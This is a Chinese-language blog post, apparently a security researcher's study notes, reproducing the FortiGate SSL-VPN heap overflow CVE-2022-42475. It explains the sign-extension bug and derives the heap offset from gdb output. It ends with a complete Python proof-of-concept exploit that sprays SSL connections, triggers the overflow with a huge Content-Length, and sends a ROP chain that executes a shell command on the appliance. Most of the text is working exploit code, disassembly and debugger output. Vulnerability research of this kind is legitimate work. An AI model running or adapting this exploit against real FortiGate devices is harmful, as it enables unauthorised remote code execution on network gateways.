CVE-2022-42475-FortiGate-SSLVPN HeapOverflow 学习记录

技术分享 3年前 (2023-08-21) 0 999+

前言

之前就想复现这个洞，不过因为环境的问题迟迟没有开工。巧在前一阵子有个师傅来找我讨论劫持 ssl结构体中函数指针时如何确定堆溢出的偏移，同时还他把搭建好了的环境发给了我，因此才有了此文。

如何劫持SSL结构体指针实现控制程序流

就我个人理解而言，我觉得劫持的这个函数指针类似于我们常见的 __malloc_hook，__free_hook。它本身的值为空，当他不为空时，便会调用这个函数指针。如果我们把这个函数指针劫持为合适的 gadget便可以控制程序的执行流。相关代码如下：

__int64 __fastcall debug_2nd_control(__int64 a1, char a2) {   ...       if ( v9 )       {         result = v8 + 96;         if ( v9 != v8 + 96 )         {           v10 = *(__int64 (__fastcall **)(__int64))(v9 + 192);           if ( v10 )             return v10(a1);           ... }  .text:000000000180C180 48 8B 82 C0 00 00 00                    mov     rax, [rdx+0C0h] .text:000000000180C187 4C 89 EF                                mov     rdi, r13 .text:000000000180C18A 48 85 C0                                test    rax, rax .text:000000000180C18D 0F 84 85 00 00 00                       jz      loc_180C218 .text:000000000180C193 5B                                      pop     rbx .text:000000000180C194 41 5C                                   pop     r12 .text:000000000180C196 41 5D                                   pop     r13 .text:000000000180C198 41 5E                                   pop     r14 .text:000000000180C19A 5D                                      pop     rbp .text:000000000180C19B FF E0                                   jmp     rax

漏洞点

从下面的汇编中可知，这里分配的大小是由 movsxd rsi, esi，直接从4字节扩展为了8字节，如果我们把大小控制为0x1b00000000，这样就会导致分配并初始化的大小为 1，从而产生堆溢出。利用手法是，在堆上大量喷射 SSL结构体，从而劫持其中对应的函数指针。

0000000001811174 8B 40 18        mov     eax, [rax+18h]  ; Keypatch modified this from: 0000000001811174                 ;   nop word ptr [rax+rax+00000000h] 0000000001811174                 ; Keypatch padded NOP to next boundary: 8 bytes 0000000001811177 49 8B 3C 24     mov     rdi, [r12]      ; Keypatch modified this from: 000000000181117B E9 86 02 00 00  jmp     loc_1811406  0000000001811406 8D 70 01        lea     esi, [rax+1]    ; Keypatch modified this from: 0000000001811409 E9 96 01 00 00  jmp     loc_18115A4  00000000018115A4 48 63 F6        movsxd  rsi, esi        ; Keypatch modified this from: 00000000018115A7 E9 88 FB FF FF  jmp     loc_1811134  0000000001811134 E8 27 0A EC FF  call    alloc__

如何确定填充数量

网上已经有文章(https://forum.butian.net/index.php/share/2166)给出了一个可劫持到函数指针的poc。我们这里就直接用了他这种布局，重点记录一下如何找到这个填充的数量。对于这个固件而言，ssl结构体初始化时，我们可以看到如下的代码。很明显可以看到，他会把字符串 read_post_data拷贝到距离结构体偏移为 200的地方。而根据上面的代码可知，我们要劫持的函数指针在结构体偏移为 192的地方。故我们只需定位到 read_post_data，即可确定偏移。

sub_181BC20(a2, "read_post_data", 0, 1, (__int64)sslvpnd_read_post_data);  char *__fastcall sub_181BC20(__int64 *a1, const char *str, int a3, int a4, __int64 a5) {   ...   strLen = strlen(str);   v8 = alloc__(*a1, strLen + 201);   v9 = (__int64)v8;   if ( v8 )   {     *(_QWORD *)v8 = v8;     *((_QWORD *)v8 + 1) = v8;     v10 = &v8[32 * a3];     *((_DWORD *)v10 + 6) = a4;     *((_DWORD *)v10 + 7) = a4;     if ( (a4 & 1) != 0 )     {       *(_QWORD *)(32LL * a3 + v9 + 32) = a5;     }     else if ( (a4 & 4) != 0 )     {       *(_QWORD *)(32LL * a3 + v9 + 40) = a5;     }     strcpy((char *)(v9 + 200), str);     ... }

调试时内存分布如下，有 0x2638-0x1818 = 0xE20 = 3616

(gdb) i r $rdi rdi            0x7f6edef01818   140114163406872 (gdb) x/10gx 0x7f6edef01818 0x7f6edef01818: 0x0000000000000000      0x0000000000000000 0x7f6edef01828: 0x0000000000000000      0x0000000000000000 0x7f6edef01838: 0x0000000000000000      0x0000000000000000 0x7f6edef01848: 0x0000000000000000      0x0000000000000000 0x7f6edef01858: 0x0000000000000000      0x0000000000000000 (gdb) x/10gx 0x7f6edef02638 0x7f6edef02638: 0x0000000000000000      0x736f705f64616572 0x7f6edef02648: 0x0000617461645f74      0x0000000000000000 0x7f6edef02658: 0x0000000000000000      0x0000000000000000 0x7f6edef02668: 0x0000000000000000      0x0000000000000000 0x7f6edef02678: 0x0000000000000000      0x0000000000000000 (gdb) x/s 0x7f6edef02640 0x7f6edef02640: "read_post_data"

poc

import struct import socket import ssl  p64 = lambda x: struct.pack("<Q", x)  path = "/remote/login".encode()  ip = "192.168.229.162" port = 4443  def create_ssl_ctx():     _socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     _socket.connect((ip, port))     _default_context = ssl._create_unverified_context()     _socket = _default_context.wrap_socket(_socket)     return _socket  socks = []  for i in range(60):     sk = create_ssl_ctx()     data = b"POST " + path + b" HTTP/1.1rnHost: 192.168.229.146rnContent-Length: 100rnUser-Agent: Mozilla/5.0rnContent-Type: text/plain;charset=UTF-8rnAccept: */*rnrna=1"     sk.sendall(data)     socks.append(sk)  for i in range(20, 40, 2):     sk = socks[i]     sk.close()     socks[i] = None  CL = "115964116992" data = b"POST " + path + b" HTTP/1.1rnHost: 192.168.229.146rnContent-Length: " + CL.encode() + b"rnUser-Agent: Mozilla/5.0rnContent-Type: text/plain;charset=UTF-8rnAccept: */*rnrnf=1"  exp_sk = create_ssl_ctx()  for i in range(20):     sk = create_ssl_ctx()     socks.append(sk)  exp_sk.sendall(data)  payload = b"b" * (3613-0xc0) payload+= p64(0) payload+= p64(0x19de70a) # 0x00000000019de70a : pop r12 ; pop r13 ; pop rbp ; ret payload+= p64(0x100)*3 payload+= p64(0x1855c29) # 0x0000000001855c29 : add rdx, r8 ; mov byte ptr [rdx], 0 ; ret payload+= p64(0x1fe54ad) # 0x0000000001fe54ad : pop rbp ; mov rax, rdx ; ret payload+= p64(0x30) payload+= p64(0x18cfb70) # 0x00000000018cfb70 : lea rdi, [rax - 0x28] ; call qword ptr [rax + 0x30] payload+= p64(0x40)*(24-9)  payload+= p64(0x1d3379c) # rip # push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret payload+= p64(0x736f705f64616572) payload+= p64(0x0000617461645f74) cmd = b"busybox ls > /tmp/hack" cmd = cmd.ljust(11*0x8, b'x00') payload+= cmd payload+= p64(0x43FDF0)  exp_sk.sendall(payload)  for sk in socks:     if sk:         data = b"b" * 40         sk.sendall(data)  print("done")